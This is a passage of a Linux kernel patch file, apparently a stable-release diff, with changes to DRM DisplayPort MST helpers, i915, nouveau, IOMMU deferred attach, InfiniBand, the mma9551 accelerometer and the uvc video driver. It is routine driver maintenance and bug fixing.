+@@ -5354,28 +5364,53 @@ struct drm_dp_mst_topology_state *drm_atomic_get_mst_topology_state(struct drm_a
+ }
+ EXPORT_SYMBOL(drm_atomic_get_mst_topology_state);
+ 
++/**
++ * drm_atomic_get_old_mst_topology_state: get old MST topology state in atomic state, if any
++ * @state: global atomic state
++ * @mgr: MST topology manager, also the private object in this case
++ *
++ * This function wraps drm_atomic_get_old_private_obj_state() passing in the MST atomic
++ * state vtable so that the private object state returned is that of a MST
++ * topology object.
++ *
++ * Returns:
++ *
++ * The old MST topology state, or NULL if there's no topology state for this MST mgr
++ * in the global atomic state
++ */
++struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_private_state *old_priv_state =
++		drm_atomic_get_old_private_obj_state(state, &mgr->base);
++
++	return old_priv_state ? to_dp_mst_topology_state(old_priv_state) : NULL;
++}
++EXPORT_SYMBOL(drm_atomic_get_old_mst_topology_state);
++
+ /**
+  * drm_atomic_get_new_mst_topology_state: get new MST topology state in atomic state, if any
+  * @state: global atomic state
+  * @mgr: MST topology manager, also the private object in this case
+  *
+- * This function wraps drm_atomic_get_priv_obj_state() passing in the MST atomic
++ * This function wraps drm_atomic_get_new_private_obj_state() passing in the MST atomic
+  * state vtable so that the private object state returned is that of a MST
+  * topology object.
+  *
+  * Returns:
+  *
+- * The MST topology state, or NULL if there's no topology state for this MST mgr
++ * The new MST topology state, or NULL if there's no topology state for this MST mgr
+  * in the global atomic state
+  */
+ struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr)
+ {
+-	struct drm_private_state *priv_state =
++	struct drm_private_state *new_priv_state =
+ 		drm_atomic_get_new_private_obj_state(state, &mgr->base);
+ 
+-	return priv_state ? to_dp_mst_topology_state(priv_state) : NULL;
++	return new_priv_state ? to_dp_mst_topology_state(new_priv_state) : NULL;
+ }
+ EXPORT_SYMBOL(drm_atomic_get_new_mst_topology_state);
+ 
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3efce05d7b57c..3a6e176d77aa5 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -107,9 +107,6 @@ config DRM_I915_USERPTR
+ 
+ 	  If in doubt, say "Y".
+ 
+-config DRM_I915_GVT
+-	bool
+-
+ config DRM_I915_GVT_KVMGT
+ 	tristate "Enable KVM host support Intel GVT-g graphics virtualization"
+ 	depends on DRM_I915
+@@ -160,3 +157,6 @@ menu "drm/i915 Unstable Evolution"
+ 	depends on DRM_I915
+ 	source "drivers/gpu/drm/i915/Kconfig.unstable"
+ endmenu
++
++config DRM_I915_GVT
++	bool
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 6c2686ecb62a2..dedbdb175f8b4 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5950,6 +5950,10 @@ int intel_modeset_all_pipes(struct intel_atomic_state *state,
+ 		if (ret)
+ 			return ret;
+ 
++		ret = intel_dp_mst_add_topology_state_for_crtc(state, crtc);
++		if (ret)
++			return ret;
++
+ 		ret = intel_atomic_add_affected_planes(state, crtc);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 4077a979a9249..dcda003d5a6e2 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -365,8 +365,14 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 	struct intel_dp *intel_dp = &dig_port->dp;
+ 	struct intel_connector *connector =
+ 		to_intel_connector(old_conn_state->connector);
+-	struct drm_dp_mst_topology_state *mst_state =
+-		drm_atomic_get_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *old_mst_state =
++		drm_atomic_get_old_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *new_mst_state =
++		drm_atomic_get_new_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	const struct drm_dp_mst_atomic_payload *old_payload =
++		drm_atomic_get_mst_payload_state(old_mst_state, connector->port);
++	struct drm_dp_mst_atomic_payload *new_payload =
++		drm_atomic_get_mst_payload_state(new_mst_state, connector->port);
+ 	struct drm_i915_private *i915 = to_i915(connector->base.dev);
+ 
+ 	drm_dbg_kms(&i915->drm, "active links %d\n",
+@@ -374,8 +380,8 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 
+ 	intel_hdcp_disable(intel_mst->connector);
+ 
+-	drm_dp_remove_payload(&intel_dp->mst_mgr, mst_state,
+-			      drm_atomic_get_mst_payload_state(mst_state, connector->port));
++	drm_dp_remove_payload(&intel_dp->mst_mgr, new_mst_state,
++			      old_payload, new_payload);
+ 
+ 	intel_audio_codec_disable(encoder, old_crtc_state, old_conn_state);
+ }
+@@ -1018,3 +1024,64 @@ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state)
+ 	return crtc_state->mst_master_transcoder != INVALID_TRANSCODER &&
+ 	       crtc_state->mst_master_transcoder != crtc_state->cpu_transcoder;
+ }
++
++/**
++ * intel_dp_mst_add_topology_state_for_connector - add MST topology state for a connector
++ * @state: atomic state
++ * @connector: connector to add the state for
++ * @crtc: the CRTC @connector is attached to
++ *
++ * Add the MST topology state for @connector to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++static int
++intel_dp_mst_add_topology_state_for_connector(struct intel_atomic_state *state,
++					      struct intel_connector *connector,
++					      struct intel_crtc *crtc)
++{
++	struct drm_dp_mst_topology_state *mst_state;
++
++	if (!connector->mst_port)
++		return 0;
++
++	mst_state = drm_atomic_get_mst_topology_state(&state->base,
++						      &connector->mst_port->mst_mgr);
++	if (IS_ERR(mst_state))
++		return PTR_ERR(mst_state);
++
++	mst_state->pending_crtc_mask |= drm_crtc_mask(&crtc->base);
++
++	return 0;
++}
++
++/**
++ * intel_dp_mst_add_topology_state_for_crtc - add MST topology state for a CRTC
++ * @state: atomic state
++ * @crtc: CRTC to add the state for
++ *
++ * Add the MST topology state for @crtc to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc)
++{
++	struct drm_connector *_connector;
++	struct drm_connector_state *conn_state;
++	int i;
++
++	for_each_new_connector_in_state(&state->base, _connector, conn_state, i) {
++		struct intel_connector *connector = to_intel_connector(_connector);
++		int ret;
++
++		if (conn_state->crtc != &crtc->base)
++			continue;
++
++		ret = intel_dp_mst_add_topology_state_for_connector(state, connector, crtc);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.h b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+index f7301de6cdfb3..f1815bb722672 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.h
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+@@ -8,6 +8,8 @@
+ 
+ #include <linux/types.h>
+ 
++struct intel_atomic_state;
++struct intel_crtc;
+ struct intel_crtc_state;
+ struct intel_digital_port;
+ struct intel_dp;
+@@ -18,5 +20,7 @@ int intel_dp_mst_encoder_active_links(struct intel_digital_port *dig_port);
+ bool intel_dp_mst_is_master_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_source_support(struct intel_dp *intel_dp);
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc);
+ 
+ #endif /* __INTEL_DP_MST_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index f76c06b7f1d4a..17e8bf2ac0e51 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -638,7 +638,13 @@ void intel_fbdev_set_suspend(struct drm_device *dev, int state, bool synchronous
+ 	struct intel_fbdev *ifbdev = dev_priv->display.fbdev.fbdev;
+ 	struct fb_info *info;
+ 
+-	if (!ifbdev || !ifbdev->vma)
++	if (!ifbdev)
++		return;
++
++	if (drm_WARN_ON(&dev_priv->drm, !HAS_DISPLAY(dev_priv)))
++		return;
++
++	if (!ifbdev->vma)
+ 		goto set_suspend;
+ 
+ 	info = ifbdev->helper.info;
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+index 58ea3325bbdaa..fa2b9c48f39b2 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+@@ -464,12 +464,15 @@ static bool reg_needs_read_steering(struct intel_gt *gt,
+ 				    i915_mcr_reg_t reg,
+ 				    enum intel_steering_type type)
+ {
+-	const u32 offset = i915_mmio_reg_offset(reg);
++	u32 offset = i915_mmio_reg_offset(reg);
+ 	const struct intel_mmio_range *entry;
+ 
+ 	if (likely(!gt->steering_table[type]))
+ 		return false;
+ 
++	if (IS_GSI_REG(offset))
++		offset += gt->uncore->gsi_offset;
++
+ 	for (entry = gt->steering_table[type]; entry->end; entry++) {
+ 		if (offset >= entry->start && offset <= entry->end)
+ 			return true;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index edcb2529b4025..ed9d374147b8d 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -885,7 +885,7 @@ nv50_msto_prepare(struct drm_atomic_state *state,
+ 
+ 	// TODO: Figure out if we want to do a better job of handling VCPI allocation failures here?
+ 	if (msto->disabled) {
+-		drm_dp_remove_payload(mgr, mst_state, payload);
++		drm_dp_remove_payload(mgr, mst_state, payload, payload);
+ 
+ 		nvif_outp_dp_mst_vcpi(&mstm->outp->outp, msto->head->base.index, 0, 0, 0, 0);
+ 	} else {
+diff --git a/drivers/iio/accel/mma9551_core.c b/drivers/iio/accel/mma9551_core.c
+index 64ca7d7a9673d..b898f865fb875 100644
+--- a/drivers/iio/accel/mma9551_core.c
++++ b/drivers/iio/accel/mma9551_core.c
+@@ -296,9 +296,12 @@ int mma9551_read_config_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_CONFIG,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_config_word, IIO_MMA9551);
+ 
+@@ -354,9 +357,12 @@ int mma9551_read_status_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_STATUS,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_status_word, IIO_MMA9551);
+ 
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 68721ff10255e..7e508b15e7761 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -479,13 +479,20 @@ static int compare_netdev_and_ip(int ifindex_a, struct sockaddr *sa,
+ 	if (sa->sa_family != sb->sa_family)
+ 		return sa->sa_family - sb->sa_family;
+ 
+-	if (sa->sa_family == AF_INET)
+-		return memcmp((char *)&((struct sockaddr_in *)sa)->sin_addr,
+-			      (char *)&((struct sockaddr_in *)sb)->sin_addr,
++	if (sa->sa_family == AF_INET &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in)) {
++		return memcmp(&((struct sockaddr_in *)sa)->sin_addr,
++			      &((struct sockaddr_in *)sb)->sin_addr,
+ 			      sizeof(((struct sockaddr_in *)sa)->sin_addr));
++	}
++
++	if (sa->sa_family == AF_INET6 &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in6)) {
++		return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
++				     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	}
+ 
+-	return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
+-			     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	return -1;
+ }
+ 
+ static int cma_add_id_to_tree(struct rdma_id_private *node_id_priv)
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index ebe970f76232d..90b672feed83d 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -1056,7 +1056,7 @@ static void read_link_down_reason(struct hfi1_devdata *dd, u8 *ldr);
+ static void handle_temp_err(struct hfi1_devdata *dd);
+ static void dc_shutdown(struct hfi1_devdata *dd);
+ static void dc_start(struct hfi1_devdata *dd);
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np);
+ static void clear_full_mgmt_pkey(struct hfi1_pportdata *ppd);
+ static int wait_link_transfer_active(struct hfi1_devdata *dd, int wait_ms);
+@@ -13362,7 +13362,6 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 	int ret;
+ 	unsigned ngroups;
+ 	int rmt_count;
+-	int user_rmt_reduced;
+ 	u32 n_usr_ctxts;
+ 	u32 send_contexts = chip_send_contexts(dd);
+ 	u32 rcv_contexts = chip_rcv_contexts(dd);
+@@ -13421,28 +13420,34 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 					 (num_kernel_contexts + n_usr_ctxts),
+ 					 &node_affinity.real_cpu_mask);
+ 	/*
+-	 * The RMT entries are currently allocated as shown below:
+-	 * 1. QOS (0 to 128 entries);
+-	 * 2. FECN (num_kernel_context - 1 + num_user_contexts +
+-	 *    num_netdev_contexts);
+-	 * 3. netdev (num_netdev_contexts).
+-	 * It should be noted that FECN oversubscribe num_netdev_contexts
+-	 * entries of RMT because both netdev and PSM could allocate any receive
+-	 * context between dd->first_dyn_alloc_text and dd->num_rcv_contexts,
+-	 * and PSM FECN must reserve an RMT entry for each possible PSM receive
+-	 * context.
++	 * RMT entries are allocated as follows:
++	 * 1. QOS (0 to 128 entries)
++	 * 2. FECN (num_kernel_context - 1 [a] + num_user_contexts +
++	 *          num_netdev_contexts [b])
++	 * 3. netdev (NUM_NETDEV_MAP_ENTRIES)
++	 *
++	 * Notes:
++	 * [a] Kernel contexts (except control) are included in FECN if kernel
++	 *     TID_RDMA is active.
++	 * [b] Netdev and user contexts are randomly allocated from the same
++	 *     context pool, so FECN must cover all contexts in the pool.
+ 	 */
+-	rmt_count = qos_rmt_entries(dd, NULL, NULL) + (num_netdev_contexts * 2);
+-	if (HFI1_CAP_IS_KSET(TID_RDMA))
+-		rmt_count += num_kernel_contexts - 1;
+-	if (rmt_count + n_usr_ctxts > NUM_MAP_ENTRIES) {
+-		user_rmt_reduced = NUM_MAP_ENTRIES - rmt_count;
+-		dd_dev_err(dd,
+-			   "RMT size is reducing the number of user receive contexts from %u to %d\n",
+-			   n_usr_ctxts,
+-			   user_rmt_reduced);
+-		/* recalculate */
+-		n_usr_ctxts = user_rmt_reduced;
++	rmt_count = qos_rmt_entries(num_kernel_contexts - 1, NULL, NULL)
++		    + (HFI1_CAP_IS_KSET(TID_RDMA) ? num_kernel_contexts - 1
++						  : 0)
++		    + n_usr_ctxts
++		    + num_netdev_contexts
++		    + NUM_NETDEV_MAP_ENTRIES;
++	if (rmt_count > NUM_MAP_ENTRIES) {
++		int over = rmt_count - NUM_MAP_ENTRIES;
++		/* try to squish user contexts, minimum of 1 */
++		if (over >= n_usr_ctxts) {
++			dd_dev_err(dd, "RMT overflow: reduce the requested number of contexts\n");
++			return -EINVAL;
++		}
++		dd_dev_err(dd, "RMT overflow: reducing # user contexts from %u to %u\n",
++			   n_usr_ctxts, n_usr_ctxts - over);
++		n_usr_ctxts -= over;
+ 	}
+ 
+ 	/* the first N are kernel contexts, the rest are user/netdev contexts */
+@@ -14299,15 +14304,15 @@ static void clear_rsm_rule(struct hfi1_devdata *dd, u8 rule_index)
+ }
+ 
+ /* return the number of RSM map table entries that will be used for QOS */
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np)
+ {
+ 	int i;
+ 	unsigned int m, n;
+-	u8 max_by_vl = 0;
++	uint max_by_vl = 0;
+ 
+ 	/* is QOS active at all? */
+-	if (dd->n_krcv_queues <= MIN_KERNEL_KCTXTS ||
++	if (n_krcv_queues < MIN_KERNEL_KCTXTS ||
+ 	    num_vls == 1 ||
+ 	    krcvqsset <= 1)
+ 		goto no_qos;
+@@ -14365,7 +14370,7 @@ static void init_qos(struct hfi1_devdata *dd, struct rsm_map_table *rmt)
+ 
+ 	if (!rmt)
+ 		goto bail;
+-	rmt_entries = qos_rmt_entries(dd, &m, &n);
++	rmt_entries = qos_rmt_entries(dd->n_krcv_queues - 1, &m, &n);
+ 	if (rmt_entries == 0)
+ 		goto bail;
+ 	qpns_per_vl = 1 << m;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 50d858f36a81b..f8100067502fb 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -371,6 +371,30 @@ err_unlock:
+ 	return ret;
+ }
+ 
++static bool iommu_is_attach_deferred(struct device *dev)
++{
++	const struct iommu_ops *ops = dev_iommu_ops(dev);
++
++	if (ops->is_attach_deferred)
++		return ops->is_attach_deferred(dev);
++
++	return false;
++}
++
++static int iommu_group_do_dma_first_attach(struct device *dev, void *data)
++{
++	struct iommu_domain *domain = data;
++
++	lockdep_assert_held(&dev->iommu_group->mutex);
++
++	if (iommu_is_attach_deferred(dev)) {
++		dev->iommu->attach_deferred = 1;
++		return 0;
++	}
++
++	return __iommu_attach_device(domain, dev);
++}
++
+ int iommu_probe_device(struct device *dev)
+ {
+ 	const struct iommu_ops *ops;
+@@ -401,7 +425,7 @@ int iommu_probe_device(struct device *dev)
+ 	 * attach the default domain.
+ 	 */
+ 	if (group->default_domain && !group->owner) {
+-		ret = __iommu_attach_device(group->default_domain, dev);
++		ret = iommu_group_do_dma_first_attach(dev, group->default_domain);
+ 		if (ret) {
+ 			mutex_unlock(&group->mutex);
+ 			iommu_group_put(group);
+@@ -951,16 +975,6 @@ out:
+ 	return ret;
+ }
+ 
+-static bool iommu_is_attach_deferred(struct device *dev)
+-{
+-	const struct iommu_ops *ops = dev_iommu_ops(dev);
+-
+-	if (ops->is_attach_deferred)
+-		return ops->is_attach_deferred(dev);
+-
+-	return false;
+-}
+-
+ /**
+  * iommu_group_add_device - add a device to an iommu group
+  * @group: the group into which to add the device (reference should be held)
+@@ -1013,8 +1027,8 @@ rename:
+ 
+ 	mutex_lock(&group->mutex);
+ 	list_add_tail(&device->list, &group->devices);
+-	if (group->domain  && !iommu_is_attach_deferred(dev))
+-		ret = __iommu_attach_device(group->domain, dev);
++	if (group->domain)
++		ret = iommu_group_do_dma_first_attach(dev, group->domain);
+ 	mutex_unlock(&group->mutex);
+ 	if (ret)
+ 		goto err_put_group;
+@@ -1780,21 +1794,10 @@ static void probe_alloc_default_domain(struct bus_type *bus,
+ 
+ }
+ 
+-static int iommu_group_do_dma_attach(struct device *dev, void *data)
+-{
+-	struct iommu_domain *domain = data;
+-	int ret = 0;
+-
+-	if (!iommu_is_attach_deferred(dev))
+-		ret = __iommu_attach_device(domain, dev);
+-
+-	return ret;
+-}
+-
+-static int __iommu_group_dma_attach(struct iommu_group *group)
++static int __iommu_group_dma_first_attach(struct iommu_group *group)
+ {
+ 	return __iommu_group_for_each_dev(group, group->default_domain,
+-					  iommu_group_do_dma_attach);
++					  iommu_group_do_dma_first_attach);
+ }
+ 
+ static int iommu_group_do_probe_finalize(struct device *dev, void *data)
+@@ -1859,7 +1862,7 @@ int bus_iommu_probe(struct bus_type *bus)
+ 
+ 		iommu_group_create_direct_mappings(group);
+ 
+-		ret = __iommu_group_dma_attach(group);
++		ret = __iommu_group_dma_first_attach(group);
+ 
+ 		mutex_unlock(&group->mutex);
+ 
+@@ -1991,9 +1994,11 @@ static int __iommu_attach_device(struct iommu_domain *domain,
+ 		return -ENODEV;
+ 
+ 	ret = domain->ops->attach_dev(domain, dev);
+-	if (!ret)
+-		trace_attach_device_to_domain(dev);
+-	return ret;
++	if (ret)
++		return ret;
++	dev->iommu->attach_deferred = 0;
++	trace_attach_device_to_domain(dev);
++	return 0;
+ }
+ 
+ /**
+@@ -2038,7 +2043,7 @@ EXPORT_SYMBOL_GPL(iommu_attach_device);
+ 
+ int iommu_deferred_attach(struct device *dev, struct iommu_domain *domain)
+ {
+-	if (iommu_is_attach_deferred(dev))
++	if (dev->iommu && dev->iommu->attach_deferred)
+ 		return __iommu_attach_device(domain, dev);
+ 
+ 	return 0;
+@@ -2047,9 +2052,6 @@ int iommu_deferred_attach(struct device *dev, struct iommu_domain *domain)
+ static void __iommu_detach_device(struct iommu_domain *domain,
+ 				  struct device *dev)
+ {
+-	if (iommu_is_attach_deferred(dev))
+-		return;
+-
+ 	domain->ops->detach_dev(domain, dev);
+ 	trace_detach_device_from_domain(dev);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 44b0cfb8ee1c7..067b43a1cb3eb 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -1509,6 +1510,10 @@ static void uvc_ctrl_status_event_work(struct work_struct *work)
+ 
+ 	uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
+ 
++	/* The barrier is needed to synchronize with uvc_status_stop(). */
++	if (smp_load_acquire(&dev->flush_status))
++		return;
++
+ 	/* Resubmit the URB. */
+ 	w->urb->interval = dev->int_ep->desc.bInterval;
+ 	ret = usb_submit_urb(w->urb, GFP_KERNEL);
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index d5ff8df20f18a..362df9dd31525 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -252,14 +252,10 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+ 		if (fmtdesc != NULL) {
+-			strscpy(format->name, fmtdesc->name,
+-				sizeof(format->name));
+ 			format->fcc = fmtdesc->fcc;
+ 		} else {
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			snprintf(format->name, sizeof(format->name), "%pUl\n",
+-				&buffer[5]);
+ 			format->fcc = 0;
+ 		}
+ 
+@@ -271,8 +267,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		 */
+ 		if (dev->quirks & UVC_QUIRK_FORCE_Y8) {
+ 			if (format->fcc == V4L2_PIX_FMT_YUYV) {
+-				strscpy(format->name, "Greyscale 8-bit (Y8  )",
+-					sizeof(format->name));
+ 				format->fcc = V4L2_PIX_FMT_GREY;
+ 				format->bpp = 8;
+ 				width_multiplier = 2;
+@@ -313,7 +307,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strscpy(format->name, "MJPEG", sizeof(format->name));
+ 		format->fcc = V4L2_PIX_FMT_MJPEG;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED;
+ 		format->bpp = 0;
+@@ -329,17 +322,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		switch (buffer[8] & 0x7f) {
+-		case 0:
+-			strscpy(format->name, "SD-DV", sizeof(format->name));
+-			break;
+-		case 1:
+-			strscpy(format->name, "SDL-DV", sizeof(format->name));
+-			break;
+-		case 2:
+-			strscpy(format->name, "HD-DV", sizeof(format->name));
+-			break;
+-		default:
++		if ((buffer[8] & 0x7f) > 2) {
+ 			uvc_dbg(dev, DESCR,
+ 				"device %d videostreaming interface %d: unknown DV format %u\n",
+ 				dev->udev->devnum,
+@@ -347,9 +330,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strlcat(format->name, buffer[8] & (1 << 7) ? " 60Hz" : " 50Hz",
+-			sizeof(format->name));
+-
+ 		format->fcc = V4L2_PIX_FMT_DV;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED | UVC_FMT_FLAG_STREAM;
+ 		format->bpp = 0;
+@@ -376,7 +356,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		return -EINVAL;
+ 	}
+ 
+-	uvc_dbg(dev, DESCR, "Found format %s\n", format->name);
++	uvc_dbg(dev, DESCR, "Found format %p4cc", &format->fcc);
+ 
+ 	buflen -= buffer[0];
+ 	buffer += buffer[0];
+@@ -880,10 +860,8 @@ static int uvc_parse_vendor_control(struct uvc_device *dev,
+ 					       + n;
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], 2*n);
+ 
+-		if (buffer[24+p+2*n] != 0)
+-			usb_string(udev, buffer[24+p+2*n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[24+p+2*n] == 0 ||
++		    usb_string(udev, buffer[24+p+2*n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1007,15 +985,15 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 			memcpy(term->media.bmTransportModes, &buffer[10+n], p);
+ 		}
+ 
+-		if (buffer[7] != 0)
+-			usb_string(udev, buffer[7], term->name,
+-				   sizeof(term->name));
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
+-			sprintf(term->name, "Camera %u", buffer[3]);
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
+-			sprintf(term->name, "Media %u", buffer[3]);
+-		else
+-			sprintf(term->name, "Input %u", buffer[3]);
++		if (buffer[7] == 0 ||
++		    usb_string(udev, buffer[7], term->name, sizeof(term->name)) < 0) {
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
++				sprintf(term->name, "Camera %u", buffer[3]);
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
++				sprintf(term->name, "Media %u", buffer[3]);
++			else
++				sprintf(term->name, "Input %u", buffer[3]);
++		}
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+ 		break;
+@@ -1048,10 +1026,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(term->baSourceID, &buffer[7], 1);
+ 
+-		if (buffer[8] != 0)
+-			usb_string(udev, buffer[8], term->name,
+-				   sizeof(term->name));
+-		else
++		if (buffer[8] == 0 ||
++		    usb_string(udev, buffer[8], term->name, sizeof(term->name)) < 0)
+ 			sprintf(term->name, "Output %u", buffer[3]);
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+@@ -1073,10 +1049,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(unit->baSourceID, &buffer[5], p);
+ 
+-		if (buffer[5+p] != 0)
+-			usb_string(udev, buffer[5+p], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[5+p] == 0 ||
++		    usb_string(udev, buffer[5+p], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Selector %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1106,10 +1080,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		if (dev->uvc_version >= 0x0110)
+ 			unit->processing.bmVideoStandards = buffer[9+n];
+ 
+-		if (buffer[8+n] != 0)
+-			usb_string(udev, buffer[8+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[8+n] == 0 ||
++		    usb_string(udev, buffer[8+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Processing %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1137,10 +1109,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		unit->extension.bmControls = (u8 *)unit + sizeof(*unit);
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], n);
+ 
+-		if (buffer[23+p+n] != 0)
+-			usb_string(udev, buffer[23+p+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[23+p+n] == 0 ||
++		    usb_string(udev, buffer[23+p+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
